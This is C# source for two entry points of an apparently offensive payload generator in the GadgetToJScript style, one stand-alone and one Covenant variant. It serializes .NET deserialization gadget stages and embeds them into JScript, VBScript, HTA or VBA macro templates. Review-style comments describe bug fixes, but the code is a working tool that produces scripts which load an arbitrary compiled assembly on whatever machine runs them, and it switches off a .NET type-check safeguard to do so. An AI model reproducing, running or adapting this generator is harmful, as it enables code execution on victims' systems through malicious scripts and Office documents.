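// Entry point of the payload generator: parses the CLI, produces the two
// serialized gadget stages and renders them into the selected WSH template
// (js / vbs / hta; "vba" is recognised but rejected in this build).
//
// Review notes (security-relevant, all visible in this block):
//  * BinaryFormatter is used here only to *produce* the stage-2 stream that is
//    embedded in the output script; nothing is deserialized in this process.
//  * The AppSettings switch below disables the ActivitySurrogateSelector type
//    check for this process only, which is what allows the stage-2 gadget to
//    be serialized at all. Stage 1 comes from _DisableTypeCheckGadgetGenerator
//    and presumably flips the same switch on the consuming side -- confirm
//    against that generator rather than relying on this comment.
//  * The output path is taken verbatim from the operator, the script extension
//    is appended, and an existing file is silently truncated; no directory is
//    created, so a missing parent directory surfaces as an unhandled
//    DirectoryNotFoundException.
//
// Fixes relative to the previous version: "-h/--help" no longer demands a
// value and is actually honoured; null option values are treated like empty
// ones; a missing embedded template is reported instead of dereferencing null.
static void Main(string[] args)
{
    var wantHelp = false;
    var options = new OptionSet()
    {
        { "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
        { "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
        { "r|regfree", "registration-free activation of .NET based COM components", v => _regFree = v != null },
        // No trailing '=': help takes no argument. The old "h|help=" made a bare
        // -h fail parsing, and the flag was never checked afterwards.
        { "h|help", "Show Help", v => wantHelp = v != null },
    };

    try
    {
        options.Parse(args);
    }
    catch (Exception e)
    {
        Console.WriteLine(e.Message);
        Console.WriteLine("Try --help for more information.");
        showHelp(options);
        return;
    }

    // IsNullOrEmpty covers both an uninitialised field and an explicit "".
    if (wantHelp || string.IsNullOrEmpty(_wsh) || string.IsNullOrEmpty(_outputFName))
    {
        showHelp(options);
        return;
    }

    // Case-sensitive membership test against the EWSH enum names; the switch
    // below relies on the same exact spelling.
    if (!Enum.IsDefined(typeof(EWSH), _wsh))
    {
        showHelp(options);
        return;
    }

    string resourceName;
    switch (_wsh)
    {
        case "vbs":
            resourceName = "GadgetToJScript.templates.vbscript.template";
            break;
        case "vba":
            Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
            return;
        case "hta":
            resourceName = "GadgetToJScript.templates.htascript.template";
            break;
        case "js":
        default:
            // "js" and the fallback (unreachable once IsDefined passes, assuming
            // EWSH holds only the four documented names) pick the same template;
            // --regfree selects the registration-free JScript variant.
            resourceName = _regFree
                ? "GadgetToJScript.templates.jscript-regfree.template"
                : "GadgetToJScript.templates.jscript.template";
            break;
    }

    // Stage 1: the type-check-disabling gadget, produced by the project helper.
    MemoryStream stage1 = new _DisableTypeCheckGadgetGenerator().generateGadget(new MemoryStream());

    // Process-local: lets BinaryFormatter serialize the surrogate-based stage-2
    // graph in *this* generator. It does not affect the target.
    ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

    // Stage 2: the compiled test assembly wrapped in the surrogate gadget and
    // serialized with BinaryFormatter (intentional -- this IS the payload).
    Assembly testAssembly = TestAssemblyLoader.compile();
    var stage2 = new MemoryStream();
    new BinaryFormatter().Serialize(stage2, new _ASurrogateGadgetGenerator(testAssembly));

    string template;
    using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
    {
        // GetManifestResourceStream returns null for an unknown resource name;
        // the previous version would have thrown NullReferenceException here.
        if (stream == null)
        {
            Console.WriteLine("Embedded template not found: " + resourceName);
            return;
        }
        using (var reader = new StreamReader(stream))
        {
            template = reader.ReadToEnd();
        }
    }

    // Both stages are embedded base64-encoded together with their raw lengths.
    template = template
        .Replace("%_STAGE1_%", Convert.ToBase64String(stage1.ToArray()))
        .Replace("%_STAGE1Len_%", stage1.Length.ToString())
        .Replace("%_STAGE2_%", Convert.ToBase64String(stage2.ToArray()))
        .Replace("%_STAGE2Len_%", stage2.Length.ToString());

    using (var writer = new StreamWriter(_outputFName + "." + _wsh))
    {
        writer.WriteLine(template);
    }
}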
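// Covenant-style entry point: same pipeline as the stand-alone generator
// (parse CLI, serialize the two gadget stages, render the chosen template),
// plus VBA support where the stages are emitted as chunked string
// concatenation in either base64 or hex encoding.
//
// Review notes (security-relevant, all visible in this block):
//  * BinaryFormatter is used only to *produce* the stage-2 stream; this
//    process never deserializes anything.
//  * The AppSettings switch disables the ActivitySurrogateSelector type check
//    in this process only, so that the stage-2 graph can be serialized. Stage 1
//    (_DisableTypeCheckGadgetGenerator) presumably performs the equivalent on
//    the consuming side -- verify against that generator.
//  * The output path is operator-supplied, the extension is appended, and an
//    existing file is truncated without warning.
//  * The help text says "-e" defaults to b64, but that default must come from
//    the field initialiser of _enc (not visible here); with a null _enc the
//    ENC check below simply shows the help.
//
// Fixes relative to the previous version: "-h/--help" takes no value and is
// honoured; null option values are treated like empty ones; a missing embedded
// template is reported instead of dereferencing null; the VBA chunk rendering
// is factored into ToVbaStringAssignments, which also tolerates an empty
// chunk list instead of indexing [0] unconditionally.
public static void DoStuff(string[] args)
{
    var wantHelp = false;
    var options = new OptionSet()
    {
        { "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
        { "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v },
        { "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
        { "r|regfree", "registration-free activation of .NET based COM components", v => _regFree = v != null },
        // No trailing '=': help takes no argument and is checked after parsing.
        { "h|help", "Show Help", v => wantHelp = v != null },
    };

    try
    {
        options.Parse(args);
    }
    catch (Exception e)
    {
        Console.WriteLine(e.Message);
        Console.WriteLine("Try --help for more information.");
        showHelp(options);
        return;
    }

    if (wantHelp || string.IsNullOrEmpty(_wsh) || string.IsNullOrEmpty(_outputFName))
    {
        showHelp(options);
        return;
    }

    // Both values must be exact (case-sensitive) names of the EWSH / ENC enums;
    // the null guard on _enc avoids the ArgumentNullException IsDefined throws.
    if (!Enum.IsDefined(typeof(EWSH), _wsh) || _enc == null || !Enum.IsDefined(typeof(ENC), _enc))
    {
        showHelp(options);
        return;
    }

    string resourceName;
    switch (_wsh)
    {
        case "vbs":
            resourceName = "CovToJScript.GadgetToJScript.templates.vbscript.template";
            break;
        case "vba":
            // Two VBA templates, one per encoding of the embedded stages.
            resourceName = _enc == "b64"
                ? "CovToJScript.GadgetToJScript.templates.vbascriptb64.template"
                : "CovToJScript.GadgetToJScript.templates.vbascripthex.template";
            break;
        case "hta":
            resourceName = "CovToJScript.GadgetToJScript.templates.htascript.template";
            break;
        case "js":
        default:
            // "js" and the fallback (unreachable once IsDefined passes, assuming
            // EWSH holds only the four documented names) share the same choice.
            resourceName = _regFree
                ? "CovToJScript.GadgetToJScript.templates.jscript-regfree.template"
                : "CovToJScript.GadgetToJScript.templates.jscript.template";
            break;
    }

    // Stage 1: the type-check-disabling gadget from the project helper.
    MemoryStream stage1 = new _DisableTypeCheckGadgetGenerator().generateGadget(new MemoryStream());

    // Process-local switch so BinaryFormatter accepts the surrogate-based
    // stage-2 graph in this generator; it has no effect on the target.
    System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

    // Stage 2: compiled test assembly wrapped in the surrogate gadget and
    // serialized with BinaryFormatter (intentional -- this is the payload).
    Assembly testAssembly = TestAssemblyLoader.compile();
    var stage2 = new MemoryStream();
    new BinaryFormatter().Serialize(stage2, new _ASurrogateGadgetGenerator(testAssembly));

    string template;
    using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
    {
        // Null means the resource name is not embedded in this assembly.
        if (stream == null)
        {
            Console.WriteLine("Embedded template not found: " + resourceName);
            return;
        }
        using (var reader = new StreamReader(stream))
        {
            template = reader.ReadToEnd();
        }
    }

    if (_wsh != "vba")
    {
        // WSH templates take the stages as single base64 blobs plus raw lengths.
        template = template
            .Replace("%_STAGE1_%", Convert.ToBase64String(stage1.ToArray()))
            .Replace("%_STAGE1Len_%", stage1.Length.ToString())
            .Replace("%_STAGE2_%", Convert.ToBase64String(stage2.ToArray()))
            .Replace("%_STAGE2Len_%", stage2.Length.ToString());
    }
    else
    {
        // VBA templates receive the stages as a block of string assignments,
        // 100 characters per line, in the requested encoding.
        byte[] bytes1 = stage1.ToArray();
        byte[] bytes2 = stage2.ToArray();
        string text1 = _enc == "b64" ? Convert.ToBase64String(bytes1) : BitConverter.ToString(bytes1).Replace("-", "");
        string text2 = _enc == "b64" ? Convert.ToBase64String(bytes2) : BitConverter.ToString(bytes2).Replace("-", "");

        template = template
            .Replace("%_STAGE1_%", ToVbaStringAssignments("stage_1", SplitToLines(text1, 100).ToList()))
            .Replace("%_STAGE2_%", ToVbaStringAssignments("stage_2", SplitToLines(text2, 100).ToList()));
    }

    using (var writer = new StreamWriter(_outputFName + "." + _wsh))
    {
        writer.WriteLine(template);
    }
}

// Renders a list of chunks as VBA string building code:
//   name = "<chunk0>"
//   name = name & "<chunk1>"
//   ...
// The first chunk is emitted as-is, later chunks are Trim()'d, mirroring the
// previous inline implementation. An empty list yields `name = ""`.
private static string ToVbaStringAssignments(string name, List<string> chunks)
{
    var sb = new StringBuilder();
    if (chunks.Count == 0)
    {
        sb.Append(name).Append(" = \"\"").AppendLine();
        return sb.ToString();
    }

    sb.Append(name).Append(" = \"").Append(chunks[0]).Append("\"").AppendLine();
    foreach (string chunk in chunks.Skip(1))
    {
        sb.Append(name).Append(" = ").Append(name).Append(" & \"").Append(chunk.Trim()).Append("\"").AppendLine();
    }
    return sb.ToString();
}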